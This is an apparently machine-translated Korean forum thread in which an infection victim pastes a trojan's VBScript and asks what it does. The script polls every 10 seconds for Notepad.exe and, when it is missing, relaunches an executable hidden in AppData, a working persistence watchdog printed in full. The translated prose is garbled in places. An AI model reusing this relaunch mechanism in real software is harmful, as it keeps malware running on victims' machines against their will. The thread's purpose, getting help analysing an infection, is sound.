먼저 미안하다고 말하고 싶습니다.누군가이 코드를 이해하도록 도와 줄 수 있습니까? 트로이 Dropper VBS 스크립트에 감염 됨
이런 것들을 물어 보는 가장 좋은 장소는 아니지만 바이러스에 감염되어 흔적을 남기는 것 같습니다.
누군가가 일부 스크립트의 코드를 이해할 수 있다면 매우 감사 할 것입니다.
Option Explicit
Dim ProcessPath,WshShell
ProcessPath = "%Windir%\System32\Notepad.exe"
Set WshShell = CreateObject("WScript.Shell")
If AppPrevInstance() Then
MsgBox "There is an existing proceeding !" & VbCrLF &_
CommandLineLike(WScript.ScriptName),VbExclamation,"There is an existing proceeding !"
WScript.Quit
Else
Do
Pause(10) ' Pause 10 seconds
If CheckProcess(DblQuote(ProcessPath)) = False Then
Call Logoff()
End If
Loop
End If
'**************************************************************************
Function CheckProcess(ProcessPath)
Dim strComputer,objWMIService,colProcesses,Tab,ProcessName
strComputer = "."
Tab = Split(ProcessPath,"\")
ProcessName = Tab(UBound(Tab))
ProcessName = Replace(ProcessName,Chr(34),"")
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcesses = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = '"& ProcessName & "'")
If colProcesses.Count = 0 Then
CheckProcess = False
Else
CheckProcess = True
End if
End Function
'**************************************************************************
Function DblQuote(Str)
DblQuote = Chr(34) & Str & Chr(34)
End Function
'**************************************************************************
Sub Logoff()
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Exec("C:\Users\Sblck\AppData\Local\AppVShNotifyt.exe")
Set objShell = Nothing
Wscript.Quit
End sub
'**************************************************************************
Sub Pause(Secs)
Wscript.Sleep(Secs * 1000)
End Sub
'**************************************************************************
Function AppPrevInstance()
With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")
With .ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE " & CommandLineLike(WScript.ScriptFullName) & _
" AND CommandLine LIKE '%WScript%' OR CommandLine LIKE '%cscript%'")
AppPrevInstance = (.Count > 1)
End With
End With
End Function
'***************************************************************************
Function CommandLineLike(ProcessPath)
ProcessPath = Replace(ProcessPath, "\", "\\")
CommandLineLike = "'%" & ProcessPath & "%'"
End Function
'****************************************************************************
좀 다른 스크립트가, 내가 코드를 오른쪽 형식의 희망하지만, TXT 형태의 diference는이 같은 "% 일 %"에 리모트 objShell.Exec 에 있습니다
그것은 쉽게AppVShNotifytvbs.vbs PasteBin link
을 만드는 경우objShell.Exec("%working%")^
나는 그것의 거 포스트 페이스트 빈 년대 해요3210
AppVShNotifytvbs.txt Pastebin link
이 질문은 [정보 보안] (https://security.stackexchange.com/)에 속해 있으므로 오프 토픽으로 닫으려고합니다. –
그냥이 VBScript를 어디서 얻었 을까? 원래 스크립트가 수정 된 스크립트가 아님을 의미합니까? – Hackoo
내가 의심스런 프로그램을 실행 시켰고, 빠른 cmd가 인스턴스가 실행 중일 때 팝업으로 나타나서 시스템을 검사하기 위해 서둘러서 스크립트가 exe (두 프로그램 모두)에 의해 xml 파일과 non 확장 기능. 주 프로그램은 트로이 목마처럼 행동했으며, AppVShNotifyt.exe와 내 드라이브에있는 스크립트가있는 것 같습니다. –